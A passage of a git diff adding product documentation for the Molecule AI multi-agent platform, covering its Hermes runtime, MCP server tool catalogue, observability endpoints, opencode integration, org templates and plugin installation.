+`response_format=json_schema` is wired through to the Anthropic native dispatch path. Pass a JSON Schema definition to request strictly-typed JSON output from the model:
+
+```python
+executor = HermesA2AExecutor(
+    response_format={
+        "type": "json_schema",
+        "json_schema": {
+            "name": "audit_finding",
+            "schema": {
+                "type": "object",
+                "properties": {
+                    "severity":    {"type": "string", "enum": ["critical", "high", "medium", "low"]},
+                    "description": {"type": "string"},
+                    "remediation": {"type": "string"}
+                },
+                "required": ["severity", "description", "remediation"]
+            }
+        }
+    }
+)
+```
+
+The model's completion will always be valid JSON matching the schema. The Gemini native and OpenAI-compat shim paths do not yet support `response_format` — it is silently ignored on those paths.
+
+---
+
+## Capability table
+
+### Shipped (Phases 2a–2e — all merged to main)
+
+| Capability | OpenAI-compat shim | Anthropic native | Gemini native |
+|---|---|---|---|
+| Plain text, single-turn | ✅ | ✅ | ✅ |
+| Multi-turn history | ⚠️ flattened into one user blob | ✅ role-attributed turns | ✅ `role: "model"` + `parts` wrapper |
+| Correct Gemini wire format | ❌ wrong role, missing parts | — | ✅ |
+| No compat-shim translation overhead | ❌ every request translated | ✅ | ✅ |
+| Stacked system messages (`system_blocks`) | ❌ | ✅ | ✅ |
+| Native `tools=[]` parameter | ⚠️ text-in-prompt injection | ✅ PR #644 | 📋 roadmap |
+| Structured output (`response_format=json_schema`) | ❌ | ✅ PR #645 | 📋 roadmap |
+
+### Roadmap (future release)
+
+| Capability | Anthropic native | Gemini native |
+|---|---|---|
+| Vision content blocks | 📋 | 📋 |
+| Streaming | 📋 | 📋 |
+| Native tools on Gemini path | — | 📋 |
+| Structured output on Gemini path | — | 📋 |
+
+---
+
+## Troubleshooting
+
+### `RuntimeError: anthropic is not installed`
+
+The `anthropic` Python package is missing from the workspace image. Add `anthropic` to `requirements.txt` in your custom image and rebuild, or use the standard `molecule-ai-workspace-template-hermes` image.
+
+### Gemini workspace getting Anthropic dispatch instead
+
+A global `ANTHROPIC_API_KEY` is taking priority. Clear it at the workspace level:
+```bash
+curl -X PUT $MOLECULE_API/workspaces/$GEMINI_WS/secrets \
+  -d '{"key":"ANTHROPIC_API_KEY","value":""}'
+```
+
+### Multi-turn context lost between calls
+
+Each workspace maintains its own history buffer. Ensure you are sending all turns of a conversation to the same workspace. A2A `context_id` scopes history within the workspace.
+
+### OpenAI-compat shim returns garbled Gemini output
+
+If you are routing a Gemini model through a key that triggers the compat shim (e.g. `OPENROUTER_API_KEY`), you will see the old role/format translation issues. Switch to `GEMINI_API_KEY` for native dispatch.
+
+---
+
+## See also
+
+- [Concepts — Workspaces](/docs/concepts#workspaces)
+- [API Reference — POST /workspaces](/docs/api-reference#post-workspaces)
+- [Google ADK Runtime](/docs/google-adk) — Gemini-native alternative to Hermes for ADK-first workflows
+- PR #240: [Phase 2a — native Anthropic dispatch](https://github.com/Molecule-AI/molecule-core/pull/240)
+- PR #255: [Phase 2b — native Gemini dispatch](https://github.com/Molecule-AI/molecule-core/pull/255)
+- PR #267: [Phase 2c — multi-turn history on all paths](https://github.com/Molecule-AI/molecule-core/pull/267)
+- Issue [#513](https://github.com/Molecule-AI/molecule-core/issues/513)
--- a/content/docs/incidents/INCIDENT_LOG.md
+++ b/content/docs/incidents/INCIDENT_LOG.md
@ -1,3 +1,6 @@
+---
+title: "Incident Log — molecule-core"
+---
 # Incident Log — molecule-core

 > This file documents security incidents, outages, and degraded states.
--- a/content/docs/index.mdx
+++ b/content/docs/index.mdx
@ -0,0 +1,83 @@
+---
+title: Welcome to Molecule AI
+description: Multi-agent organisations as code — templates, plugins, channels, and the runtime that ties them together.
+---
+
+Molecule AI is an open platform for building, running, and operating
+multi-agent organisations. You define your team in one YAML file
+(`org.yaml`), pick the plugins each role needs, wire up the channels they
+talk on, schedule their recurring work — and the platform takes care of the
+rest.
+
+## Try it now
+
+| | |
+|---|---|
+| **Dashboard** | [app.moleculesai.app](https://app.moleculesai.app) — create orgs, deploy agents |
+| **API** | [api.moleculesai.app](https://api.moleculesai.app) — control plane REST API |
+| **Documentation** | [doc.moleculesai.app](https://doc.moleculesai.app) — you are here |
+| **Status** | [status.moleculesai.app](https://status.moleculesai.app) — uptime monitoring |
+| **Self-host** | [Self-Hosting Guide](/docs/self-hosting) — run on your own infrastructure |
+
+## What you can build
+
+- **Self-running engineering teams** — PM, Dev Lead, frontend / backend / devops
+  agents, security auditor, QA — all coordinating through A2A messages and
+  scheduled audits, opening real PRs to your real repo.
+- **Research squads** — market analysts, technical researchers, competitive
+  intelligence agents that sweep the web on a cadence and write findings to
+  shared memory.
+- **Product orgs** — anything you can describe as a tree of roles and
+  responsibilities.
+- **Hybrid teams** — mix cloud-hosted agents with [external agents](/docs/external-agents)
+  running on your own infrastructure, edge devices, or other clouds.
+
+## How it works
+
+1. **Templates.** Describe your org as a YAML tree of workspaces. Each workspace
+   is a real container running an LLM agent. Templates ship with sensible
+   defaults so you can spin one up in one command.
+2. **Plugins.** Add capabilities to one role or all of them — guardrails,
+   skills, slash commands, browser automation, MCP servers. Plugins compose;
+   per-role overrides UNION with the defaults.
+3. **Channels.** Connect any role to [Telegram, Slack, or Lark/Feishu](/docs/channels)
+   so users can talk to agents directly from their existing tools.
+4. **Schedules.** Define [recurring work](/docs/schedules) in cron syntax. The
+   runtime fires the prompt at the scheduled time, supervised against panics
+   with a liveness watchdog.
+5. **Tokens.** Generate [API tokens](/docs/tokens) per workspace for secure
+   authentication. Rotate, revoke, and audit from the dashboard or API.
+6. **The canvas.** A live visualisation of your org — every workspace as a
+   node, every A2A message as an edge, every memory write tracked in real time.
+
+## Eight runtime adapters
+
+| Runtime | Description |
+|---------|-------------|
+| Claude Code | Anthropic Claude with code execution |
+| LangGraph | LangChain ReAct agent with tools |
+| OpenClaw | Multi-file prompt system with SOUL |
+| CrewAI | Role-based agent with task delegation |
+| AutoGen | Microsoft conversable agents |
+| DeepAgents | Deep research with planning |
+| Hermes | NousResearch Hermes-3 multi-provider |
+| Gemini CLI | Google Gemini CLI workspace |
+
+## Integrate with everything
+
+- **[MCP Server](/docs/mcp-server)** — 87 tools for managing Molecule AI from any
+  MCP-compatible AI agent (Claude Code, Cursor, etc.)
+- **[Python SDK](https://pypi.org/project/molecule-ai-sdk)** — `pip install molecule-ai-sdk`
+- **[External Agents](/docs/external-agents)** — register any HTTP agent as a
+  first-class workspace
+
+## Where to next
+
+- New here? Read the [Quickstart](/docs/quickstart) — spin up your first
+  agent in under five minutes.
+- Want the architecture tour? Start with [Concepts](/docs/concepts) and
+  [Architecture](/docs/architecture).
+- Ready to build your own org? Jump to [Org Templates](/docs/org-template).
+- Want to connect your own agent? See [External Agents](/docs/external-agents).
+- Need API access? Check [Token Management](/docs/tokens) and the
+  [API Reference](/docs/api-reference).
--- a/content/docs/integrations/opencode.md
+++ b/content/docs/integrations/opencode.md
@ -1,3 +1,6 @@
+---
+title: "Molecule AI + opencode Integration"
+---
 # Molecule AI + opencode Integration

 > **opencode** is an AI coding agent ([opencode.ai](https://opencode.ai)) that supports remote MCP servers via `opencode.json`. This guide shows how to wire it to your Molecule AI workspace.
--- a/content/docs/mcp-server.mdx
+++ b/content/docs/mcp-server.mdx
@ -0,0 +1,162 @@
+---
+title: MCP Server
+description: Manage Molecule AI workspaces from any MCP-compatible AI agent using 87 tools.
+---
+
+The Molecule AI MCP server lets any MCP-compatible AI agent (Claude Code,
+Cursor, etc.) manage workspaces, agents, secrets, memory, schedules,
+channels, and more through the platform API.
+
+## Quick start
+
+### Install
+
+```bash
+npx @molecule-ai/mcp-server@1.0.0
+```
+
+### Configure in `.mcp.json`
+
+```json
+{
+  "mcpServers": {
+    "molecule": {
+      "type": "stdio",
+      "command": "npx",
+      "args": ["@molecule-ai/mcp-server@1.0.0"],
+      "env": {
+        "MOLECULE_URL": "http://localhost:8080"
+      }
+    }
+  }
+}
+```
+
+<Callout type="warn">
+  **Pin the package version.** The examples above use `@1.0.0` — always specify an exact version and omit the `-y` flag. An unpinned `npx -y @molecule-ai/mcp-server` (no version) silently installs whatever npm serves on the next restart; if the package is ever compromised, it runs with your full MCP client permissions. Check [npm](https://www.npmjs.com/package/@molecule-ai/mcp-server) for the latest stable release before upgrading.
+</Callout>
+
+For SaaS deployments, set `MOLECULE_URL` to your tenant URL:
+
+```json
+"MOLECULE_URL": "https://your-org.moleculesai.app"
+```
+
+### Verify
+
+Once configured, your MCP client should show 87 Molecule AI tools. Test with:
+
+```
+list_workspaces
+```
+
+## Tool categories
+
+The MCP server exposes tools across these categories:
+
+### Workspace management
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_workspaces` | `GET /workspaces` | List all workspaces |
+| `create_workspace` | `POST /workspaces` | Create a new workspace |
+| `get_workspace` | `GET /workspaces/:id` | Get workspace details |
+| `update_workspace` | `PATCH /workspaces/:id` | Update workspace fields |
+| `delete_workspace` | `DELETE /workspaces/:id` | Delete a workspace |
+| `restart_workspace` | `POST /workspaces/:id/restart` | Restart container |
+| `pause_workspace` | `POST /workspaces/:id/pause` | Pause workspace |
+| `resume_workspace` | `POST /workspaces/:id/resume` | Resume paused workspace |
+
+### Communication
+
+| Tool | API Route | Description |
+|---|---|---|
+| `chat_with_agent` | `POST /workspaces/:id/a2a` | Send A2A message |
+| `async_delegate` | `POST /workspaces/:id/delegate` | Fire-and-forget delegation |
+| `check_delegations` | `GET /workspaces/:id/delegations` | Check delegation status |
+| `list_peers` | `GET /registry/:id/peers` | Find peer workspaces |
+| `notify_user` | `POST /workspaces/:id/notify` | Push notification to canvas |
+
+### Configuration and secrets
+
+| Tool | API Route | Description |
+|---|---|---|
+| `get_config` | `GET /workspaces/:id/config` | Get config.yaml |
+| `update_config` | `PATCH /workspaces/:id/config` | Update config |
+| `list_secrets` | `GET /workspaces/:id/secrets` | List secret keys |
+| `set_secret` | `POST /workspaces/:id/secrets` | Set a secret |
+| `set_global_secret` | `PUT /settings/secrets` | Set a global secret |
+
+### Memory
+
+| Tool | API Route | Description |
+|---|---|---|
+| `memory_list` | `GET /workspaces/:id/memory` | List memory keys |
+| `memory_get` | `GET /workspaces/:id/memory/:key` | Get value |
+| `memory_set` | `POST /workspaces/:id/memory` | Set key-value |
+| `search_memory` | `GET /workspaces/:id/memories` | Full-text search |
+
+### Files
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_files` | `GET /workspaces/:id/files` | List workspace files |
+| `read_file` | `GET /workspaces/:id/files/*path` | Read file content |
+| `write_file` | `PUT /workspaces/:id/files/*path` | Write file |
+| `replace_all_files` | `PUT /workspaces/:id/files` | Replace all files |
+
+### Schedules
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_schedules` | `GET /workspaces/:id/schedules` | List cron schedules |
+| `create_schedule` | `POST /workspaces/:id/schedules` | Create schedule |
+| `run_schedule` | `POST /workspaces/:id/schedules/:id/run` | Trigger now |
+
+### Channels
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_channels` | `GET /workspaces/:id/channels` | List channels |
+| `add_channel` | `POST /workspaces/:id/channels` | Add Telegram/Slack/Lark |
+| `test_channel` | `POST /workspaces/:id/channels/:id/test` | Test connectivity |
+| `send_channel_message` | `POST /workspaces/:id/channels/:id/send` | Send message |
+
+### Plugins
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_installed_plugins` | `GET /workspaces/:id/plugins` | List installed |
+| `install_plugin` | `POST /workspaces/:id/plugins` | Install from source |
+| `uninstall_plugin` | `DELETE /workspaces/:id/plugins/:name` | Uninstall |
+
+### Tokens
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_tokens` | `GET /workspaces/:id/tokens` | List workspace tokens |
+| `create_token` | `POST /workspaces/:id/tokens` | Create bearer token |
+| `revoke_token` | `DELETE /workspaces/:id/tokens/:id` | Revoke token |
+
+### Templates and bundles
+
+| Tool | API Route | Description |
+|---|---|---|
+| `list_templates` | `GET /templates` | Available templates |
+| `import_org` | `POST /org/import` | Import org template |
+| `export_bundle` | `GET /bundles/export/:id` | Export workspace |
+| `import_bundle` | `POST /bundles/import` | Import workspace |
+
+## Environment variables
+
+| Variable | Default | Description |
+|---|---|---|
+| `MOLECULE_URL` | `http://localhost:8080` | Platform API URL |
+
+## Troubleshooting
+
+| Issue | Fix |
+|---|---|
+| Connection refused | Check `MOLECULE_URL` points to running platform |
+| 401 Unauthorized | Token expired or revoked — create a new one |
+| Tools not showing | Run `npx @molecule-ai/mcp-server@1.0.0` standalone to check errors |
--- a/content/docs/meta.json
+++ b/content/docs/meta.json
@ -0,0 +1,32 @@
+{
+  "title": "Documentation",
+  "pages": [
+    "index",
+    "changelog",
+    "quickstart",
+    "concepts",
+    "workspace-config",
+    "architecture",
+    "org-template",
+    "plugins",
+    "channels",
+    "schedules",
+    "external-agents",
+    "tokens",
+    "api-reference",
+    "mcp-server",
+    "self-hosting",
+    "self-hosting/admin-token",
+    "observability",
+    "troubleshooting",
+    "---Security---",
+    "security/index",
+    "security/safe-mcp-advisory",
+    "security/owasp-agentic-top-10",
+    "---Runtimes---",
+    "google-adk",
+    "hermes",
+    "---Integrations---",
+    "opencode"
+  ]
+}
--- a/content/docs/observability.mdx
+++ b/content/docs/observability.mdx
@ -0,0 +1,180 @@
+---
+title: Observability
+description: Monitor agent activity, LLM traces, and platform health.
+---
+
+## Overview
+
+Molecule AI provides multiple layers of observability -- from real-time WebSocket events on the canvas to structured activity logs, LLM traces, Prometheus metrics, and admin health endpoints.
+
+## Activity Logs
+
+Every significant action in the platform is recorded in the `activity_logs` table. Query logs for a specific workspace:
+
+```
+GET /workspaces/:id/activity
+```
+
+Activity types include:
+
+- **A2A communications** -- request/response capture with duration and method
+- **Task updates** -- agent-reported task status changes
+- **Agent logs** -- structured log entries from workspace runtimes
+- **Errors** -- failures with `error_detail` for debugging
+
+Filter by source to separate user-agent chat (`source=canvas`) from agent-to-agent traffic (`source=agent`).
+
+Activity logs are automatically cleaned up based on `ACTIVITY_RETENTION_DAYS` (default 7). The cleanup job runs every `ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6).
+
+## LLM Traces
+
+Molecule AI integrates with [Langfuse](https://langfuse.com) for LLM observability. Langfuse runs as part of the infrastructure stack on port 3001, backed by ClickHouse for efficient trace storage.
+
+View traces for a specific workspace:
+
+```
+GET /workspaces/:id/traces
+```
+
+The Langfuse UI at `http://localhost:3001` provides:
+
+- Token usage and cost tracking per workspace
+- Latency breakdowns for LLM calls
+- Prompt/completion pairs for debugging
+- Trace timelines showing multi-step agent reasoning
+
+## Prometheus Metrics
+
+The platform exposes Prometheus-format metrics at:
+
+```
+GET /metrics
+```
+
+This endpoint requires no authentication and is safe to scrape. Metrics are in Prometheus text format (v0.0.4) and include:
+
+- Request counts by method, path, and status code
+- Request latency histograms
+- Active WebSocket connections
+- Workspace status counts
+
+Configure your Prometheus instance to scrape `http://localhost:8080/metrics` at your preferred interval.
+
+## Per-Workspace Token Metrics
+
+Track LLM token consumption per workspace — input tokens, output tokens, and Anthropic prompt-cache reads/writes — aggregated over two rolling windows:
+
+```
+GET /workspaces/:id/metrics
+```
+
+Requires a **workspace bearer token** (`Authorization: Bearer <token>`). Returns:
+
+```json
+{
+  "workspace_id": "uuid",
+  "token_metrics": {
+    "1h": {
+      "input_tokens":       1250,
+      "output_tokens":       430,
+      "cache_read_tokens":   800,
+      "cache_write_tokens":  200
+    },
+    "30d": {
+      "input_tokens":      84200,
+      "output_tokens":     28100,
+      "cache_read_tokens": 52000,
+      "cache_write_tokens": 9400
+    }
+  }
+}
+```
+
+| Field | Description |
+|-------|-------------|
+| `input_tokens` | Tokens in the prompt sent to the LLM (sum over window) |
+| `output_tokens` | Tokens in the completion returned by the LLM |
+| `cache_read_tokens` | Prompt tokens served from Anthropic's prompt cache |
+| `cache_write_tokens` | Prompt tokens written into Anthropic's prompt cache |
+
+The **canvas WorkspaceUsage panel** (⊞ icon → Usage tab) displays these same metrics live, updating each time the workspace reports a heartbeat.
+
+## Admin Liveness
+
+The liveness endpoint reports the health of every supervised subsystem:
+
+```
+GET /admin/liveness
+```
+
+This endpoint requires `AdminAuth` (bearer token). It returns a `supervised.Snapshot()` for each subsystem with ages -- how long since each subsystem last reported healthy. Use this to debug stuck schedulers, stalled heartbeat goroutines, or unresponsive health sweeps before diving into logs.
+
+## WebSocket Events
+
+The canvas receives real-time updates via WebSocket at `/ws`. Every state change in the platform is broadcast to connected clients:
+
+| Event | Trigger |
+|-------|---------|
+| `WORKSPACE_ONLINE` | Workspace registers successfully |
+| `WORKSPACE_OFFLINE` | Heartbeat TTL expires or health sweep detects dead container |
+| `WORKSPACE_DEGRADED` | Error rate exceeds threshold |
+| `WORKSPACE_RECOVERED` | Error rate drops back to normal |
+| `WORKSPACE_REMOVED` | Workspace deleted |
+| `HEARTBEAT` | Periodic heartbeat from workspace |
+| `A2A_RESPONSE` | Agent-to-agent message received |
+| `AGENT_MESSAGE` | Agent pushes a message to the user |
+
+Events flow through Redis pub/sub to ensure all platform instances broadcast consistently.
+
+## Structure Events
+
+The `structure_events` table is an append-only audit log of every structural change in the platform. Each event is:
+
+1. Inserted into the database via `broadcaster.RecordAndBroadcast()`
+2. Published to Redis pub/sub
+3. Relayed to WebSocket clients
+
+Query events for a specific workspace or globally:
+
+```
+GET /events/:workspaceId    # Workspace-specific
+GET /events                 # All events
+```
+
+Both endpoints require `AdminAuth`.
+
+## Session Search
+
+Search through chat history for a workspace:
+
+```
+GET /workspaces/:id/session-search?q=deployment+error
+```
+
+This searches across both user-agent conversations and agent-to-agent A2A traffic stored in the activity logs.
+
+## Current Task Visibility
+
+Each workspace reports its current task via heartbeat. This is visible in two places:
+
+- **Canvas node** -- the workspace card on the canvas shows the current task text
+- **Heartbeat data** -- `GET /registry/discover/:id` includes `current_task` in the workspace info
+
+When `active_tasks` drops to zero, the current task field clears and the idle loop (if configured) begins its countdown.
+
+## Schedule Run History
+
+For workspaces with cron schedules, inspect past runs:
+
+```
+GET /workspaces/:id/schedules/:scheduleId/history
+```
+
+Each history entry includes:
+
+- Execution timestamp
+- Status (`success`, `failed`, `skipped`)
+- Duration
+- `error_detail` when the run failed (populated by `scheduler.fireSchedule`)
+
+A status of `skipped` means the workspace was busy (active tasks > 0) when the schedule fired and the concurrency-aware scheduler chose not to queue the prompt.
--- a/content/docs/opencode.mdx
+++ b/content/docs/opencode.mdx
@ -0,0 +1,165 @@
+---
+title: opencode Integration
+description: Use opencode as an AI coding agent connected to your Molecule AI workspace via remote MCP.
+---
+
+## Overview
+
+[opencode](https://opencode.ai) is an AI coding agent that supports remote MCP
+servers via `opencode.json`. With Molecule AI's MCP bridge you can wire opencode
+directly to your workspace — giving it the full A2A tool surface
+(`delegate_task`, `list_peers`, `recall_memory`, and more) over a standard
+`Authorization: Bearer` connection.
+
+```
+opencode (terminal)
+  ↕  opencode.json declares remote MCP
+Molecule AI MCP endpoint
+  ↕  WorkspaceAuth middleware
+Your workspace agent
+```
+
+---
+
+## Prerequisites
+
+- A running Molecule AI platform (`MOLECULE_MCP_URL` — e.g. `https://api.molecule.ai`)
+- A workspace-scoped bearer token (`MOLECULE_MCP_TOKEN`) issued via the platform API (see [Token Management](/docs/tokens))
+
+---
+
+## 1. Declare Molecule as a remote MCP server
+
+Create (or extend) `opencode.json` in your project root:
+
+```json
+{
+  "mcpServers": {
+    "molecule": {
+      "type": "remote",
+      "url": "${MOLECULE_MCP_URL}/workspaces/${WORKSPACE_ID}/mcp",
+      "headers": { "Authorization": "Bearer ${MOLECULE_MCP_TOKEN}" },
+      "description": "Molecule AI A2A orchestration — delegate_task, list_peers, check_task_status"
+    }
+  }
+}
+```
+
+> ⚠️ **Never embed the token in the URL** (e.g. `?token=…`). Always use the
+> `Authorization: Bearer` header — URL-embedded tokens appear in server logs,
+> browser history, and Git history if the file is committed.
+
+A pre-configured template is available in
+`org-templates/molecule-dev/opencode.json` in the monorepo.
+
+---
+
+## 2. Obtain a workspace-scoped token
+
+```bash
+curl -X POST https://$MOLECULE_MCP_URL/workspaces/$WORKSPACE_ID/tokens \
+  -H "Authorization: Bearer $ADMIN_TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"name": "opencode-agent", "scopes": ["mcp:read", "mcp:delegate"]}'
+```
+
+Store the returned token as `MOLECULE_MCP_TOKEN` in your `.env`.
+
+See [Token Management](/docs/tokens) for rotation, revocation, and auditing.
+
+---
+
+## 3. Available tools
+
+When opencode connects to the Molecule MCP endpoint the agent gains access to:
+
+| Tool | Description |
+|------|-------------|
+| `list_peers` | Discover available workspaces in your org |
+| `delegate_task` | Send a task to a peer workspace and wait for the result |
+| `delegate_task_async` | Fire-and-forget task delegation; returns a `task_id` |
+| `check_task_status` | Poll an async delegation by `task_id` |
+| `commit_memory` | Persist information to `LOCAL` or `TEAM` memory scope |
+| `recall_memory` | Search previously committed memories |
+
+### Restricted tools
+
+- **`send_message_to_user`** — disabled for remote MCP callers by default. Enable
+  with `MOLECULE_MCP_ALLOW_SEND_MESSAGE=true` in your platform env.
+- **`GLOBAL` memory scope** — `commit_memory` with `scope: GLOBAL` is blocked for
+  external agents. `LOCAL` and `TEAM` scopes are always available.
+
+---
+
+## 4. Example: delegate a research task
+
+Once connected, opencode can call Molecule tools directly in its tool loop:
+
+```json
+{
+  "tool": "delegate_task",
+  "arguments": {
+    "target": "research-lead",
+    "task": "Summarise the last 7 days of commits in Molecule-AI/molecule-monorepo"
+  }
+}
+```
+
+The platform routes the task to your `research-lead` workspace and streams the
+response back to opencode.
+
+---
+
+## 5. Two transports
+
+The MCP endpoint supports two transports — opencode auto-selects:
+
+| Transport | Endpoint | Notes |
+|-----------|----------|-------|
+| Streamable HTTP (primary) | `POST /workspaces/:id/mcp` | MCP 2024-11-05, recommended |
+| SSE (backwards compat) | `GET /workspaces/:id/mcp/stream` | Legacy clients |
+
+---
+
+## 6. Security notes
+
+### Org topology exposure (SAFE-T1401)
+
+`list_peers` returns the full set of workspace names and roles visible to your
+workspace. Any opencode agent with a valid `MOLECULE_MCP_TOKEN` can enumerate
+your org topology. Issue tokens to only the workspaces that need peer visibility.
+
+### Tool surface audit (SAFE-T1201)
+
+The full `@molecule-ai/mcp-server` package exposes additional tools beyond those
+listed above. A complete SAFE-T1201 audit is in progress. **Until that audit
+completes, do not expose the MCP server to untrusted external agents in
+production.**
+
+### Token scoping
+
+Issue tokens with the minimum required scopes (`mcp:read`, `mcp:delegate`).
+Rotate tokens regularly. Revoke via `DELETE /workspaces/:id/tokens/:token_id`.
+
+---
+
+## 7. Environment variables
+
+Add to your `.env`:
+
+```bash
+MOLECULE_MCP_URL=https://api.molecule.ai  # or http://localhost:8080 for local dev
+MOLECULE_MCP_TOKEN=                        # workspace-scoped bearer token (step 2)
+WORKSPACE_ID=                              # UUID of the workspace opencode acts as
+                                           # find it in the Canvas sidebar or GET /workspaces
+```
+
+See `.env.example` in the monorepo for the full canonical reference.
+
+---
+
+## Related
+
+- [MCP Server](/docs/mcp-server) — full tool catalogue for the `@molecule-ai/mcp-server` package
+- [Token Management](/docs/tokens) — issue, rotate, and revoke workspace tokens
+- [External Agents](/docs/external-agents) — register any HTTP agent as a first-class workspace
--- a/content/docs/org-template.mdx
+++ b/content/docs/org-template.mdx
@ -0,0 +1,166 @@
+---
+title: Org Templates
+description: Deploy entire multi-workspace organizations from a single YAML file.
+---
+
+## Overview
+
+Org templates let you define an entire agent organization -- hierarchy of workspaces with roles, configurations, and relationships -- in a single YAML file. Import one template and the platform provisions every workspace, wires parent-child relationships, seeds schedules, and installs plugins automatically.
+
+## YAML Structure
+
+A minimal org template looks like this:
+
+```yaml
+org_name: molecule-dev
+
+defaults:
+  runtime: claude-code
+  tier: 2
+  plugins:
+    - molecule-dev
+    - molecule-careful-bash
+
+workspaces:
+  pm:
+    name: Project Manager
+    role: PM
+    tier: 3
+    children:
+      dev-lead:
+        name: Dev Lead
+        children:
+          backend:
+            name: Backend Engineer
+          frontend:
+            name: Frontend Engineer
+        marketing:
+          name: Marketing Specialist
+          runtime: langgraph
+```
+
+The `workspaces` map defines the hierarchy. Each key becomes the workspace's slug. Nesting under `children` sets the parent-child relationship automatically.
+
+## Workspace Fields
+
+Each workspace entry supports the following fields:
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `name` | string | Display name shown on the canvas |
+| `role` | string | Agent role (e.g. PM, Engineer, Researcher) |
+| `runtime` | string | Runtime adapter (`claude-code`, `langgraph`, `crewai`, etc.) |
+| `tier` | integer | Resource tier (2 = Standard, 3 = Privileged, 4 = Full-host) |
+| `workspace_dir` | string | Host path for `/workspace` bind-mount |
+| `plugins` | list | Plugins to install on this workspace |
+| `initial_prompt` | string | Prompt auto-executed after A2A server is ready |
+| `idle_prompt` | string | Prompt fired periodically while workspace is idle |
+| `idle_interval_seconds` | integer | Interval for idle prompt (default 600, minimum 60) |
+| `channels` | list | Social channel integrations (Telegram, Slack, etc.) |
+| `schedules` | list | Cron schedules seeded on import |
+| `x` | number | Canvas X coordinate |
+| `y` | number | Canvas Y coordinate |
+| `children` | map | Nested child workspaces |
+
+## Defaults Layer
+
+The `defaults` block sets baseline values for every workspace in the template. Per-workspace fields override defaults when specified.
+
+**Plugin merging is additive.** Per-workspace `plugins` lists UNION with `defaults.plugins` (deduplicated, defaults first) -- they do not replace them. To opt a specific default plugin out for a given workspace, prefix the plugin name with `!` or `-`:
+
+```yaml
+defaults:
+  plugins:
+    - molecule-dev
+    - molecule-careful-bash
+    - browser-automation
+
+workspaces:
+  backend:
+    name: Backend Engineer
+    plugins:
+      - molecule-skill-code-review    # added
+      - "!browser-automation"         # opted out of default
+```
+
+In this example, the backend workspace gets `molecule-dev`, `molecule-careful-bash`, and `molecule-skill-code-review` -- but not `browser-automation`.
+
+## Template Registry
+
+Five org templates live in standalone repos under the `Molecule-AI` GitHub organization:
+
+| Template | Repo |
+|----------|------|
+| molecule-dev | `Molecule-AI/molecule-ai-org-template-molecule-dev` |
+| marketing-team | `Molecule-AI/molecule-ai-org-template-marketing-team` |
+| research-lab | `Molecule-AI/molecule-ai-org-template-research-lab` |
+| startup-mvp | `Molecule-AI/molecule-ai-org-template-startup-mvp` |
+| enterprise-ops | `Molecule-AI/molecule-ai-org-template-enterprise-ops` |
+
+These are cloned into the platform image at Docker build time and registered in the `template_registry` database table.
+
+## Importing an Org Template
+
+### Via API
+
+```bash
+curl -X POST http://localhost:8080/org/import \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer $TOKEN" \
+  -d '{"dir": "molecule-dev"}'
+```
+
+The `POST /org/import` endpoint requires `AdminAuth` (bearer token). The `dir` field references a template directory name from the registry.
+
+### Via Canvas
+
+Open the template browser in the canvas sidebar and select an org template. The UI calls the same API endpoint.
+
+## Initial Prompts
+
+Workspaces can auto-execute a prompt on startup before any user interaction. Set `initial_prompt` as an inline string or point `initial_prompt_file` to a path relative to the config directory.
+
+After the A2A server is ready, the runtime sends the prompt as a `message/send` to itself. A `.initial_prompt_done` marker file prevents re-execution on restart.
+
+**Important:** Initial prompts must NOT send A2A messages (`delegate_task`, `send_message_to_user`) because other agents may not be ready yet. Keep them local: clone a repo, read docs, save to memory, wait for tasks.
+
+Org templates support `initial_prompt` on both `defaults` (all agents) and per-workspace (overrides default).
+
+## Idle Loop
+
+The idle loop is an opt-in pattern for workspaces that should do periodic background work when they have no active tasks.
+
+When `idle_prompt` is non-empty in the workspace config, the runtime self-sends the prompt every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The fire timeout clamps to `max(60, min(300, idle_interval_seconds))`.
+
+Set per-workspace or as an org template default:
+
+```yaml
+defaults:
+  idle_prompt: "Check for new issues and update your task list."
+  idle_interval_seconds: 300
+```
+
+The idle check is local (no LLM call) and the prompt only fires when there is genuinely nothing to do, so cost collapses to event-driven.
+
+## Canvas Positioning
+
+Use `x` and `y` fields to control where workspaces appear on the drag-and-drop canvas after import:
+
+```yaml
+workspaces:
+  pm:
+    name: Project Manager
+    x: 400
+    y: 100
+    children:
+      dev:
+        name: Developer
+        x: 200
+        y: 300
+      researcher:
+        name: Researcher
+        x: 600
+        y: 300
+```
+
+If coordinates are omitted, the canvas auto-layouts new workspaces.
--- a/content/docs/plugins.mdx
+++ b/content/docs/plugins.mdx
@ -0,0 +1,388 @@
+---
+title: Plugins
+description: Extend workspace capabilities with modular plugins — guardrails, skills, workflows.
+---
+
+## Overview
+
+Plugins are installable capability bundles that extend what a workspace can do.
+They range from ambient guardrails that enforce rules automatically, to
+on-demand skills invoked via the `Skill` tool, to workflow plugins that
+compose skills into slash commands.
+
+Plugins follow a **two-axis model**: the *source* (where the plugin comes from)
+is orthogonal to the *shape* (what format it takes). This means you can install
+a plugin from a local registry or from GitHub, and the workspace runtime
+figures out how to load it based on its shape.
+
+---
+
+## Two-Axis Model
+
+### Sources (where)
+
+| Scheme | Description | Example |
+|--------|-------------|---------|
+| `local://` | Platform's curated plugin registry (auto-discovered from the `plugins/` directory) | `local://molecule-careful-bash` |
+| `github://` (pinned) | GitHub repo at a specific tag or commit SHA — **required for all installs** | `github://owner/repo#v1.2.0` |
+| `github://` (SHA) | Pin to an exact immutable commit | `github://owner/repo#abc1234` |
+
+Use `GET /plugins/sources` to list all registered install-source schemes at
+runtime.
+
+### Shapes (what)
+
+| Shape | Description |
+|-------|-------------|
+| agentskills.io format | `SKILL.md` + optional scripts, hooks, and `plugin.yaml` manifest |
+| MCP server | Model Context Protocol server (coming soon for more runtimes) |
+
+The shape is orthogonal to the source. A `github://` plugin and a `local://`
+plugin can both be agentskills.io format. The per-runtime adapter inside the
+workspace handles loading at startup.
+
+---
+
+## Installing a Plugin
+
+```bash
+curl -X POST http://localhost:8080/workspaces/{id}/plugins \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer {token}" \
